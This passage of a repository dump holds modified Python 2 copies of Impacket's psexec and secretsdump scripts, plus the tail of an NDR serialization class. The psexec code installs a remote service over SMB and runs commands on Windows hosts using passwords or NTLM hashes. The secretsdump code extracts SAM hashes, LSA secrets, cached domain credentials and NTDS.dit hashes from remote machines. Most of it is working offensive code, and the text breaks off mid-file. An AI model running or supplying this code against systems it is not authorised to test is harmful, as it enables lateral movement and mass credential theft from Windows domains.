str):\n            mnum = int(self.maxcount)\n        else:                \n            mnum = self.maxcount.get_data()\n            if self.mmod:\n                if self.mmod[0] == \"/\":\n                    mnum /= self.mmod[1]\n                elif self.mmod[0] == \"*\":\n                    mnum *= self.mmod[1]\n                else:\n                    print \"[!] Problem with operator %s\" % self.mmod[0]\n                    sys.exit(-1)\n    \n        # Pack conformant info\n        self.add_static(ndr_long(data=mnum))\n                            \n        # Offset\n        self.add_static(ndr_long(data=0x0))\n        \n        # Need example of the pptr stuff\n        if self.pptr == 1:\n            self.add_static(ndr_long(data=0x41424344))\n            \n        # Do varying stuff\n        if isinstance(self.passed, int):\n            pnum = self.passed\n        elif isinstance(self.passed, str):\n            pnum = int(self.passed)\n        else:\n            pnum = self.passed.get_data()\n            if self.pmod:\n                if self.pmod[0] == \"/\":\n                    pnum /= self.pmod[1]\n                elif self.pmod[0] == \"*\":\n                    pnum *= self.pmod[1]\n                else:\n                    print \"[!] Problem with operator %s\" % self.pmod[0]\n                    sys.exit(-1)\n        \n        # Add varying count\n        self.add_static(ndr_long(data=pnum))\n        \n        return self.array_serialize(pnum)\n"
  },
  {
    "path": "deps/psexec.py",
    "content": "#!/usr/bin/env python\n# Copyright (c) 2003-2016 CORE Security Technologies\n#\n# This software is provided under under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# PSEXEC like functionality example using RemComSvc (https://github.com/kavika13/RemCom)\n#\n# Author:\n#  beto (@agsolino)\n#\n# Reference for:\n#  DCE/RPC and SMB.\n\nimport sys\nimport os\nimport cmd\nimport logging\nfrom threading import Thread, Lock\nimport argparse\nimport random\nimport string\nimport time\n\nfrom impacket.examples import logger\nfrom impacket import version, smb\nfrom impacket.smbconnection import SMBConnection\nfrom impacket.dcerpc.v5 import transport\nfrom impacket.structure import Structure\nfrom impacket.examples import remcomsvc, serviceinstall\n\ntotalOutput=\"\"\n\nclass RemComMessage(Structure):\n    structure = (\n        ('Command','4096s=\"\"'),\n        ('WorkingDir','260s=\"\"'),\n        ('Priority','<L=0x20'),\n        ('ProcessID','<L=0x01'),\n        ('Machine','260s=\"\"'),\n        ('NoWait','<L=0'),\n    )\n\nclass RemComResponse(Structure):\n    structure = (\n        ('ErrorCode','<L=0'),\n        ('ReturnCode','<L=0'),\n    )\n\nRemComSTDOUT         = \"RemCom_stdout\"\nRemComSTDIN          = \"RemCom_stdin\"\nRemComSTDERR         = \"RemCom_stderr\"\n\nlock = Lock()\n\nclass PSEXEC:\n    def __init__(self, command, path, exeFile, copyFile, port=445,\n                 username='', password='', domain='', hashes=None, aesKey=None, doKerberos=False, kdcHost=None):\n        self.__username = username\n        self.__password = password\n        self.__port = port\n        self.__command = command\n        self.__path = path\n        self.__domain = domain\n        self.__lmhash = ''\n        self.__nthash = ''\n        self.__aesKey = aesKey\n        self.__exeFile = exeFile\n        self.__copyFile = copyFile\n        self.__doKerberos = doKerberos\n        self.__kdcHost = kdcHost\n        if hashes is not None:\n            self.__lmhash, self.__nthash = hashes.split(':')\n\n    def getOutput(self):\n    \tglobal totalOutput\n        #totalOutput=''        \n    \t#totalOutput1=totalOutput\n    \t#totalOutput=None\n        #return totalOutput1\n        return totalOutput\n\n    def clearOutput(self):\n    \tglobal totalOutput\n\ttotalOutput=''\n\n    def run(self, remoteName, remoteHost):\n\n        stringbinding = 'ncacn_np:%s[\\pipe\\svcctl]' % remoteName\n        logging.debug('StringBinding %s'%stringbinding)\n        rpctransport = transport.DCERPCTransportFactory(stringbinding)\n        rpctransport.set_dport(self.__port)\n        rpctransport.setRemoteHost(remoteHost)\n\n        if hasattr(rpctransport, 'set_credentials'):\n            # This method exists only for selected protocol sequences.\n            rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,\n                                         self.__nthash, self.__aesKey)\n\n        rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)\n        self.doStuff(rpctransport)\n\n    def openPipe(self, s, tid, pipe, accessMask):\n        pipeReady = False\n        tries = 50\n        while pipeReady is False and tries > 0:\n            try:\n                s.waitNamedPipe(tid,pipe)\n                pipeReady = True\n            except:\n                tries -= 1\n                time.sleep(2)\n                pass\n\n        if tries == 0:\n            #logging.critical('Pipe not ready, aborting')\n            raise\n\n        fid = s.openFile(tid,pipe,accessMask, creationOption = 0x40, fileAttributes = 0x80)\n\n        return fid\n\n    def doStuff(self, rpctransport):\n\n        dce = rpctransport.get_dce_rpc()\n        try:\n            dce.connect()\n        except Exception, e:\n            #import traceback\n            #traceback.print_exc()\n            #logging.critical(str(e))\n            #1may2017\n            #sys.exit(1)\n            pass\n\n        global dialect\n        dialect = rpctransport.get_smb_connection().getDialect()\n\n        try:\n            unInstalled = False\n            s = rpctransport.get_smb_connection()\n\n            # We don't wanna deal with timeouts from now on.\n            s.setTimeout(100000)\n            if self.__exeFile is None:\n                installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), remcomsvc.RemComSvc())\n            else:\n                try:\n                    f = open(self.__exeFile)\n                except Exception, e:\n                    #logging.critical(str(e))\n                    sys.exit(1)\n                installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), f)\n    \n            if installService.install() is False:\n                return\n\n            if self.__exeFile is not None:\n                f.close()\n\n            # Check if we need to copy a file for execution\n            if self.__copyFile is not None:\n                installService.copy_file(self.__copyFile, installService.getShare(), os.path.basename(self.__copyFile))\n                # And we change the command to be executed to this filename\n                self.__command = os.path.basename(self.__copyFile) + ' ' + self.__command\n\n            tid = s.connectTree('IPC$')\n            fid_main = self.openPipe(s,tid,'\\RemCom_communicaton',0x12019f)\n\n            packet = RemComMessage()\n            pid = os.getpid()\n\n            packet['Machine'] = ''.join([random.choice(string.letters) for _ in range(4)])\n            if self.__path is not None:\n                packet['WorkingDir'] = self.__path\n            packet['Command'] = self.__command\n            packet['ProcessID'] = pid\n\n            s.writeNamedPipe(tid, fid_main, str(packet))\n\n            # Here we'll store the command we type so we don't print it back ;)\n            # ( I know.. globals are nasty :P )\n            global LastDataSent\n            LastDataSent = ''\n\n            # Create the pipes threads\n            stdin_pipe = RemoteStdInPipe(rpctransport,\n                                         '\\%s%s%d' % (RemComSTDIN, packet['Machine'], packet['ProcessID']),\n                                         smb.FILE_WRITE_DATA | smb.FILE_APPEND_DATA, installService.getShare())\n            stdin_pipe.start()\n            stdout_pipe = RemoteStdOutPipe(rpctransport,\n                                           '\\%s%s%d' % (RemComSTDOUT, packet['Machine'], packet['ProcessID']),\n                                           smb.FILE_READ_DATA)\n            stdout_pipe.start()\n            stderr_pipe = RemoteStdErrPipe(rpctransport,\n                                           '\\%s%s%d' % (RemComSTDERR, packet['Machine'], packet['ProcessID']),\n                                           smb.FILE_READ_DATA)\n            stderr_pipe.start()\n            \n            # And we stay here till the end\n            ans = s.readNamedPipe(tid,fid_main,8)\n\n            if len(ans):\n                retCode = RemComResponse(ans)\n                logging.info(\"Process %s finished with ErrorCode: %d, ReturnCode: %d\" % (\n                self.__command, retCode['ErrorCode'], retCode['ReturnCode']))\n            installService.uninstall()\n            if self.__copyFile is not None:\n                # We copied a file for execution, let's remove it\n                s.deleteFile(installService.getShare(), os.path.basename(self.__copyFile))\n            unInstalled = True\n\t    #here\n            #sys.exit(retCode['ErrorCode'])\n\n        except SystemExit:\n            raise\n        except:\n            #import traceback\n            #traceback.print_exc()\n            if unInstalled is False:\n                installService.uninstall()\n                if self.__copyFile is not None:\n                    s.deleteFile(installService.getShare(), os.path.basename(self.__copyFile))\n            #here2\n\t    #sys.stdout.flush()\n            #sys.exit(1)\n\nclass Pipes(Thread):\n    def __init__(self, transport, pipe, permissions, share=None):\n        Thread.__init__(self)\n        self.server = 0\n        self.transport = transport\n        self.credentials = transport.get_credentials()\n        self.tid = 0\n        self.fid = 0\n        self.share = share\n        self.port = transport.get_dport()\n        self.pipe = pipe\n        self.permissions = permissions\n        self.daemon = True\n\n    def connectPipe(self):\n        try:\n            lock.acquire()\n            global dialect\n            #self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(), sess_port = self.port, preferredDialect = SMB_DIALECT)\n            self.server = SMBConnection(self.transport.get_smb_connection().getRemoteName(), self.transport.get_smb_connection().getRemoteHost(),\n                                        sess_port=self.port, preferredDialect=dialect)\n            user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials\n            if self.transport.get_kerberos() is True:\n                self.server.kerberosLogin(user, passwd, domain, lm, nt, aesKey, kdcHost=self.transport.get_kdcHost(), TGT=TGT, TGS=TGS)\n            else:\n                self.server.login(user, passwd, domain, lm, nt)\n            lock.release()\n            self.tid = self.server.connectTree('IPC$') \n\n            self.server.waitNamedPipe(self.tid, self.pipe)\n            self.fid = self.server.openFile(self.tid,self.pipe,self.permissions, creationOption = 0x40, fileAttributes = 0x80)\n            self.server.setTimeout(1000000)\n        except:\n            import traceback\n            #traceback.print_exc()\n            #logging.error(\"Something wen't wrong connecting the pipes(%s), try again\" % self.__class__)\n            pass\n\n\nclass RemoteStdOutPipe(Pipes):\n    def __init__(self, transport, pipe, permisssions):\n        Pipes.__init__(self, transport, pipe, permisssions)\n\n    def run(self):\n\tglobal totalOutput\n        self.connectPipe()\n        while True:\n            try:\n                ans = self.server.readFile(self.tid,self.fid, 0, 1024)\n            except:\n                pass\n            else:\n                try:\n                    global LastDataSent\n                    if ans != LastDataSent:\n            \t\ttotalOutput+=ans.decode('cp437')\n                        #sys.stdout.write(ans.decode('cp437'))\n                        sys.stdout.flush()\n                    else:\n                        # Don't echo what I sent, and clear it up\n                        LastDataSent = ''\n                    # Just in case this got out of sync, i'm cleaning it up if there are more than 10 chars, \n                    # it will give false positives tho.. we should find a better way to handle this.\n                    if LastDataSent > 10:\n                        LastDataSent = ''\n                except:\n                    pass\n\nclass RemoteStdErrPipe(Pipes):\n    def __init__(self, transport, pipe, permisssions):\n        Pipes.__init__(self, transport, pipe, permisssions)\n\n    def run(self):\n        self.connectPipe()\n        while True:\n            try:\n                ans = self.server.readFile(self.tid,self.fid, 0, 1024)\n            except:\n                pass\n            else:\n                try:\n                    #sys.stderr.write(str(ans))\n                    sys.stderr.flush()\n                except:\n                    pass\n\nclass RemoteShell(cmd.Cmd):\n    def __init__(self, server, port, credentials, tid, fid, share, transport):\n        cmd.Cmd.__init__(self, False)\n        self.prompt = '\\x08'\n        self.server = server\n        self.transferClient = None\n        self.tid = tid\n        self.fid = fid\n        self.credentials = credentials\n        self.share = share\n        self.port = port\n        self.transport = transport\n        #self.intro = '[!] Press help for extra shell commands'\n\n    def connect_transferClient(self):\n        #self.transferClient = SMBConnection('*SMBSERVER', self.server.getRemoteHost(), sess_port = self.port, preferredDialect = SMB_DIALECT)\n        self.transferClient = SMBConnection('*SMBSERVER', self.server.getRemoteHost(), sess_port=self.port,\n                                            preferredDialect=dialect)\n        user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials\n        if self.transport.get_kerberos() is True:\n            self.transferClient.kerberosLogin(user, passwd, domain, lm, nt, aesKey,\n                                              kdcHost=self.transport.get_kdcHost(), TGT=TGT, TGS=TGS)\n        else:\n            self.transferClient.login(user, passwd, domain, lm, nt)\n\n    def do_help(self, line):\n        print \"\"\"\n lcd {path}                 - changes the current local directory to {path}\n exit                       - terminates the server process (and this session)\n put {src_file, dst_path}   - uploads a local file to the dst_path RELATIVE to the connected share (%s)\n get {file}                 - downloads pathname RELATIVE to the connected share (%s) to the current local dir \n ! {cmd}                    - executes a local shell cmd\n\"\"\" % (self.share, self.share)\n        self.send_data('\\r\\n', False)\n\n    def do_shell(self, s):\n        os.system(s)\n        self.send_data('\\r\\n')\n\n    def do_get(self, src_path):\n        try:\n            if self.transferClient is None:\n                self.connect_transferClient()\n\n            import ntpath\n            filename = ntpath.basename(src_path)\n            fh = open(filename,'wb')\n            logging.info(\"Downloading %s\\%s\" % (self.share, src_path))\n            self.transferClient.getFile(self.share, src_path, fh.write)\n            fh.close()\n        except Exception, e:\n            #logging.critical(str(e))\n            pass\n\n        self.send_data('\\r\\n')\n \n    def do_put(self, s):\n        try:\n            if self.transferClient is None:\n                self.connect_transferClient()\n            params = s.split(' ')\n            if len(params) > 1:\n                src_path = params[0]\n                dst_path = params[1]\n            elif len(params) == 1:\n                src_path = params[0]\n                dst_path = '/'\n\n            src_file = os.path.basename(src_path)\n            fh = open(src_path, 'rb')\n            f = dst_path + '/' + src_file\n            pathname = string.replace(f,'/','\\\\')\n            logging.info(\"Uploading %s to %s\\%s\" % (src_file, self.share, dst_path))\n            self.transferClient.putFile(self.share, pathname.decode(sys.stdin.encoding), fh.read)\n            fh.close()\n        except Exception, e:\n            #logging.error(str(e))\n            pass\n\n        self.send_data('\\r\\n')\n\n    def do_lcd(self, s):\n        if s == '':\n            print os.getcwd()\n        else:\n            os.chdir(s)\n        self.send_data('\\r\\n')\n\n    def emptyline(self):\n\ttry:\n\t        self.send_data('\\r\\n')\n\texcept:\n\t\tpass\n        return\n\n    def default(self, line):\n        self.send_data(line.decode(sys.stdin.encoding).encode('cp437')+'\\r\\n')\n\n    def send_data(self, data, hideOutput = True):\n        if hideOutput is True:\n            global LastDataSent\n            LastDataSent = data\n        else:\n            LastDataSent = ''\n        self.server.writeFile(self.tid, self.fid, data)\n\nclass RemoteStdInPipe(Pipes):\n    def __init__(self, transport, pipe, permisssions, share=None):\n        self.shell = None\n        Pipes.__init__(self, transport, pipe, permisssions, share)\n\n    def run(self):\n        self.connectPipe()\n        self.shell = RemoteShell(self.server, self.port, self.credentials, self.tid, self.fid, self.share, self.transport)\n        try:\n            self.shell.cmdloop()\n        except:\n            pass\n\n# Process command-line arguments.\nif __name__ == '__main__':\n    # Init the example's logger theme\n    logger.init()\n    #print version.BANNER\n\n    parser = argparse.ArgumentParser(add_help = True, description = \"PSEXEC like functionality example using RemComSvc.\")\n\n    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')\n    parser.add_argument('command', nargs='*', default = ' ', help='command (or arguments if -c is used) to execute at '\n                                                                  'the target (w/o path) - (default:cmd.exe)')\n    parser.add_argument('-c', action='store',metavar = \"pathname\",  help='copy the filename for later execution, '\n                                                                         'arguments are passed in the command option')\n    parser.add_argument('-path', action='store', help='path of the command to execute')\n    parser.add_argument('-file', action='store', help=\"alternative RemCom binary (be sure it doesn't require CRT)\")\n    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n\n    group = parser.add_argument_group('authentication')\n\n    group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n    group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n    group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n                       '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '\n                       'ones specified in the command line')\n    group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n                                                                            '(128 or 256 bits)')\n\n    group = parser.add_argument_group('connection')\n\n    group.add_argument('-dc-ip', action='store', metavar=\"ip address\",\n                       help='IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in '\n                            'the target parameter')\n    group.add_argument('-target-ip', action='store', metavar=\"ip address\",\n                       help='IP Address of the target machine. If ommited it will use whatever was specified as target. '\n                            'This is useful when target is the NetBIOS name and you cannot resolve it')\n    group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar=\"destination port\",\n                       help='Destination port to connect to SMB Server')\n\n    if len(sys.argv)==1:\n        parser.print_help()\n        sys.exit(1)\n\n    options = parser.parse_args()\n\n    #if options.debug is True:\n    #    logging.getLogger().setLevel(logging.DEBUG)\n    #else:\n    #logging.getLogger().setLevel(logging.INFO)\n\n    import re\n\n    domain, username, password, remoteName = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(\n        options.target).groups('')\n    \n    #In case the password contains '@'\n    if '@' in remoteName:\n        password = password + '@' + remoteName.rpartition('@')[0]\n        remoteName = remoteName.rpartition('@')[2]\n\n    if domain is None:\n        domain = ''\n\n    if options.target_ip is None:\n        options.target_ip = remoteName\n\n    if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n        from getpass import getpass\n        password = getpass(\"Password:\")\n\n    if options.aesKey is not None:\n        options.k = True\n\n    command = ' '.join(options.command)\n    if command == ' ':\n        command = 'cmd.exe'\n\n    executer = PSEXEC(command, options.path, options.file, options.c, int(options.port), username, password, domain, options.hashes,\n                      options.aesKey, options.k, options.dc_ip)\n    executer.run(remoteName, options.target_ip)\n"
  },
  {
    "path": "deps/secretsdump.py",
    "content": "#!/usr/bin/env python\n# Copyright (c) 2003-2016 CORE Security Technologies\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description: Performs various techniques to dump hashes from the\n#              remote machine without executing any agent there.\n#              For SAM and LSA Secrets (including cached creds)\n#              we try to read as much as we can from the registry\n#              and then we save the hives in the target system\n#              (%SYSTEMROOT%\\\\Temp dir) and read the rest of the\n#              data from there.\n#              For NTDS.dit we either:\n#                a. Get the domain users list and get its hashes\n#                   and Kerberos keys using [MS-DRDS] DRSGetNCChanges()\n#                   call, replicating just the attributes we need.\n#                b. Extract NTDS.dit via vssadmin executed  with the\n#                   smbexec approach.\n#                   It's copied on the temp dir and parsed remotely.\n#\n#              The script initiates the services required for its working\n#              if they are not available (e.g. Remote Registry, even if it is \n#              disabled). After the work is done, things are restored to the \n#              original state.\n#\n# Author:\n#  Alberto Solino (@agsolino)\n#\n# References: Most of the work done by these guys. I just put all\n#             the pieces together, plus some extra magic.\n#\n# https://github.com/gentilkiwi/kekeo/tree/master/dcsync\n# http://moyix.blogspot.com.ar/2008/02/syskey-and-sam.html\n# http://moyix.blogspot.com.ar/2008/02/decrypting-lsa-secrets.html\n# http://moyix.blogspot.com.ar/2008/02/cached-domain-credentials.html\n# http://www.quarkslab.com/en-blog+read+13\n# https://code.google.com/p/creddump/\n# http://lab.mediaservice.net/code/cachedump.rb\n# http://insecurety.net/?p=768\n# http://www.beginningtoseethelight.org/ntsecurity/index.htm\n# http://www.ntdsxtract.com/downloads/ActiveDirectoryOfflineHashDumpAndForensics.pdf\n# http://www.passcape.com/index.php?section=blog&cmd=details&id=15\n#\nimport argparse\nimport codecs\nimport logging\nimport os\nimport sys\n\nfrom impacket import version\nfrom impacket.examples import logger\nfrom impacket.smbconnection import SMBConnection\n\nfrom impacket.examples.secretsdump import LocalOperations, RemoteOperations, SAMHashes, LSASecrets, NTDSHashes\n\nclass DumpSecrets:\n    #def __init__(self, address, username='', password='', domain='', options=None):\n    def __init__(self, address, username='', password='', passwordHash='', domain=''):\n\n        #self.__useVSSMethod = options.use_vss\n        self.__useVSSMethod = False\n        self.__remoteAddr = address\n        self.__username = username\n        self.__password = password\n        self.__domain = domain\n        if passwordHash!=None:\n            self.__lmhash = passwordHash.split(':')[0]\n        else:\n            self.__lmhash = ''\n        if passwordHash!=None:\n            self.__nthash = passwordHash.split(':')[1]\n        else:\n            self.__nthash = ''\n        self.__aesKey = False\n        #self.__aesKey = options.aesKey\n        self.__smbConnection = None\n        self.__remoteOps = None\n        self.__SAMHashes = None\n        self.__NTDSHashes = None\n        self.__LSASecrets = None\n        self.__systemHive = None\n        #self.__systemHive = options.system\n        self.__securityHive = None\n        #self.__securityHive = options.security\n        #self.__samHive = options.sam\n        #self.__ntdsFile = options.ntds\n        self.__samHive = None\n        self.__ntdsFile = None\n        #self.__history = options.history\n        self.__history = False\n        self.__noLMHash = True\n        self.__isRemote = True\n        #self.__outputFileName = options.outputfile\n        self.__outputFileName = \"secrets\"\n        self.__doKerberos = False\n        #self.__doKerberos = options.k\n        #self.__justDC = options.just_dc\n        self.__justDC = False\n        #self.__justDCNTLM = options.just_dc_ntlm\n        self.__justDCNTLM = False\n        #self.__justUser = options.just_dc_user\n        self.__justUser = None\n        #self.__pwdLastSet = options.pwd_last_set\n        self.__pwdLastSet = False\n        #self.__printUserStatus= options.user_status\n        self.__printUserStatus= False\n        #self.__resumeFileName = options.resumefile\n        self.__resumeFileName = None\n        self.__canProcessSAMLSA = True\n        #self.__kdcHost = options.dc_ip\n        self.__kdcHost = None\n\tself.__hashes = None\n\n        if self.__hashes is not None:\n            self.__lmhash, self.__nthash = self.__hashes.split(':')\n\n        #if options.hashes is not None:\n        #    self.__lmhash, self.__nthash = options.hashes.split(':')\n\n    def connect(self):\n        self.__smbConnection = SMBConnection(self.__remoteAddr, self.__remoteAddr)\n        if self.__doKerberos:\n            self.__smbConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash,\n                                               self.__nthash, self.__aesKey, self.__kdcHost)\n        else:\n            self.__smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)\n\n    def dump(self):\n        try:\n            if self.__remoteAddr.upper() == 'LOCAL' and self.__username == '':\n                self.__isRemote = False\n                self.__useVSSMethod = True\n                localOperations = LocalOperations(self.__systemHive)\n                bootKey = localOperations.getBootKey()\n                if self.__ntdsFile is not None:\n                    # Let's grab target's configuration about LM Hashes storage\n                    self.__noLMHash = localOperations.checkNoLMHashPolicy()\n            else:\n                self.__isRemote = True\n                bootKey = None\n                try:\n                    try:\n                        self.connect()\n                    except:\n                        if os.getenv('KRB5CCNAME') is not None and self.__doKerberos is True:\n                            # SMBConnection failed. That might be because there was no way to log into the\n                            # target system. We just have a last resort. Hope we have tickets cached and that they\n                            # will work\n                            logging.debug('SMBConnection didn\\'t work, hoping Kerberos will help')\n                            pass\n                        else:\n                            raise\n\n                    self.__remoteOps  = RemoteOperations(self.__smbConnection, self.__doKerberos, self.__kdcHost)\n                    if self.__justDC is False and self.__justDCNTLM is False or self.__useVSSMethod is True:\n                        self.__remoteOps.enableRegistry()\n                        bootKey             = self.__remoteOps.getBootKey()\n                        # Let's check whether target system stores LM Hashes\n                        self.__noLMHash = self.__remoteOps.checkNoLMHashPolicy()\n                except Exception, e:\n                    self.__canProcessSAMLSA = False\n                    if str(e).find('STATUS_USER_SESSION_DELETED') and os.getenv('KRB5CCNAME') is not None \\\n                        and self.__doKerberos is True:\n                        # Giving some hints here when SPN target name validation is set to something different to Off\n                        # This will prevent establishing SMB connections using TGS for SPNs different to cifs/\n                        logging.error('Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user')\n                    else:\n                        logging.error('RemoteOperations failed: %s' % str(e))\n\n            # If RemoteOperations succeeded, then we can extract SAM and LSA\n            if self.__justDC is False and self.__justDCNTLM is False and self.__canProcessSAMLSA:\n                try:\n                    if self.__isRemote is True:\n                        SAMFileName         = self.__remoteOps.saveSAM()\n                    else:\n                        SAMFileName         = self.__samHive\n\n                    self.__SAMHashes    = SAMHashes(SAMFileName, bootKey, isRemote = self.__isRemote)\n                    self.__SAMHashes.dump()\n                    if self.__outputFileName is not None:\n                       self.__SAMHashes.export(self.__outputFileName)\n                except Exception, e:\n                    logging.error('SAM hashes extraction failed: %s' % str(e))\n\n                try:\n                    if self.__isRemote is True:\n                        SECURITYFileName = self.__remoteOps.saveSECURITY()\n                    else:\n                        SECURITYFileName = self.__securityHive\n\n                    self.__LSASecrets = LSASecrets(SECURITYFileName, bootKey, self.__remoteOps, isRemote=self.__isRemote)\n                    self.__LSASecrets.dumpCachedHashes()\n                    if self.__outputFileName is not None:\n                        self.__LSASecrets.exportCached(self.__outputFileName)\n                    self.__LSASecrets.dumpSecrets()\n                    if self.__outputFileName is not None:\n                        self.__LSASecrets.exportSecrets(self.__outputFileName)\n                except Exception, e:\n                    logging.error('LSA hashes extraction failed: %s' % str(e))\n\n            # NTDS Extraction we can try regardless of RemoteOperations failing. It might still work\n            if self.__isRemote is True:\n                if self.__useVSSMethod and self.__remoteOps is not None:\n                    NTDSFileName = self.__remoteOps.saveNTDS()\n                else:\n                    NTDSFileName = None\n            else:\n                NTDSFileName = self.__ntdsFile\n\n            self.__NTDSHashes = NTDSHashes(NTDSFileName, bootKey, isRemote=self.__isRemote, history=self.__history,\n                                           noLMHash=self.__noLMHash, remoteOps=self.__remoteOps,\n                                           useVSSMethod=self.__useVSSMethod, justNTLM=self.__justDCNTLM,\n                                           pwdLastSet=self.__pwdLastSet, resumeSession=self.__resumeFileName,\n                                           outputFileName=self.__outputFileName, justUser=self.__justUser,\n                                           printUserStatus= self.__printUserStatus)\n            try:\n                self.__NTDSHashes.dump()\n            except Exception, e:\n                if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0:\n                    # We don't store the resume file if this error happened, since this error is related to lack\n                    # of enough privileges to access DRSUAPI.\n                    resumeFile = self.__NTDSHashes.getResumeSessionFile()\n                    if resumeFile is not None:\n                        os.unlink(resumeFile)\n                logging.error(e)\n                if self.__useVSSMethod is False:\n                    logging.info('Something wen\\'t wrong with the DRSUAPI approach. Try again with -use-vss parameter')\n            self.cleanup()\n        except (Exception, KeyboardInterrupt), e:\n            #import traceback\n            #print traceback.print_exc()\n            logging.error(e)\n            if self.__NTDSHashes is not None:\n                if isinstance(e, KeyboardInterrupt):\n                    while True:\n                        answer =  raw_input(\"Delete resume session file? [y/N] \")\n                        if answer.upper() == '':\n                            answer = 'N'\n                            break\n                        elif answer.upper() == 'Y':\n                            answer = 'Y'\n                            break\n                        elif answer.upper() == 'N':\n                            answer = 'N'\n                            break\n                    if answer == 'Y':\n                        resumeFile = self.__NTDSHashes.getResumeSessionFile()\n                        if resumeFile is not None:\n                            os.unlink(resumeFile)\n            try:\n                self.cleanup()\n            except:\n                pass\n\n    def cleanup(self):\n        logging.info('Cleaning up... ')\n        if self.__remoteOps:\n            self.__remoteOps.finish()\n        if self.__SAMHashes:\n            self.__SAMHashes.finish()\n        if self.__LSASecrets:\n            self.__LSASecrets.finish()\n        if self.__NTDSHashes:\n            self.__NTDSHashes.finish()\n\n\n# Process command-line arguments.\nif __name__ == '__main__':\n    # Init the example's logger theme\n    logger.init()\n    # Explicitly changing the stdout encoding format\n    if sys.stdout.encoding is None:\n        # Output is redirected to a file\n        sys.stdout = codecs.getwriter('utf8')(sys.stdout)\n\n    print version.BANNER\n\n    parser = argparse.ArgumentParser(add_help = True, description = \"Performs various techniques to dump secrets from \"\n                                                      \"the remote machine without executing any agent there.\")\n\n    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address> or LOCAL'\n                                                       ' (if you want to parse local files)')\n    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n    parser.add_argument('-system', action='store', help='SYSTEM hive to parse')\n    parser.add_argument('-security', action='store', help='SECURITY hive to parse')\n    parser.add_argument('-sam', action='store', help='SAM hive to parse')\n    parser.add_argument('-ntds', action='store', help='NTDS.DIT file to parse')\n    parser.add_argument('-resumefile', action='store', help='resume file name to resume NTDS.DIT session dump (only '\n                         'available to DRSUAPI approach). This file will also be used to keep updating the session\\'s '\n                         'state')\n    parser.add_argument('-outputfile', action='store',\n                        help='base output filename. Extensions will be added for sam, secrets, cached and ntds')\n    parser.add_argument('-use-vss', action='store_true', default=False,\n                        help='Use the VSS method insead of default DRSUAPI')\n    group = parser.add_argument_group('display options')\n    group.add_argument('-just-dc-user', action='store', metavar='USERNAME',\n                       help='Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. '\n                            'Implies also -just-dc switch')\n    group.add_argument('-just-dc', action='store_true', default=False,\n                        help='Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)')\n    group.add_argument('-just-dc-ntlm', action='store_true', default=False,\n                       help='Extract only NTDS.DIT data (NTLM hashes only)')\n    group.add_argument('-pwd-last-set', action='store_true', default=False,\n                       help='Shows pwdLastSet attribute for each NTDS.DIT account. Doesn\\'t apply to -outputfile data')\n    group.add_argument('-user-status', action='store_true', default=False,\n                        help='Display whether or not the user is disabled')\n    group.add_argument('-history', action='store_true', help='Dump password history')\n    group = parser.add_argument_group('authentication')\n\n    group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n    group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n    group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n                             '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use'\n                             ' the ones specified in the command line')\n    group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication'\n                                                                            ' (128 or 256 bits)')\n    group.add_argument('-dc-ip', action='store',metavar = \"ip address\",  help='IP Address of the domain controller. If '\n                                 'ommited it use the domain part (FQDN) specified in the target parameter')\n\n    if len(sys.argv)==1:\n        parser.print_help()\n        sys.exit(1)\n\n    options = parser.parse_args()\n\n    if options.debug is True:\n        logging.getLogger().setLevel(logging.DEBUG)\n    else:\n        logging.getLogger().setLevel(logging.INFO)\n\n    import re\n\n    domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(\n        options.target).groups('')\n        \n    #In case the password contains '@'\n    if '@' in address:\n        password = password + '@' + address.rpartition('@')[0]\n        address = address.rpartition('@')[2]\n\n    if options.just_dc_user is not None:\n        if options.use_vss is True:\n            logging.error('-just-dc-user switch is not supported in VSS mode')\n            sys.exit(1)\n        elif options.resumefile is not None:\n            logging.error('resuming a previous NTDS.DIT dump session not compatible with -just-dc-user switch')\n            sys.exit(1)\n        elif address.upper() == 'LOCAL' and username == '':\n            logging.error('-just-dc-user not compatible in LOCAL mode')\n            sys.exit(1)\n        else:\n            # Having this switch on implies not asking for anything else.\n            options.just_dc = True\n\n    if options.use_vss is True and options.resumefile is not None:\n        logging.error('resuming a previous NTDS.DIT dump session is not supported in VSS 